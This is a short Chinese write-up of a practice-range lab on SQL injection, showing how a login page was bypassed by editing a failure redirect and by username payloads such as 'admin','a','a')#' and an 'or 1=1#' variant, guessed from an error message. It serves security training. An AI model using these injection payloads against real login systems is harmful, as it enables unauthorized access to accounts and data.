赞
踩
SQL过滤字符后手工绕过漏洞测试(万能口令)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养
admin/123 登录尝试:
注意到登陆失败是no.php,如果改成yes呢
登录成功!
还有一种方法 是使用万能密码。输入admin'/123
根据报错,猜想语句为:username='username','a','a') and password='password'
构造账号名:admin','a','a')# 密码随意
登录成功。
123','a','a') or 1=1#/123 也可登录,万能密码
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。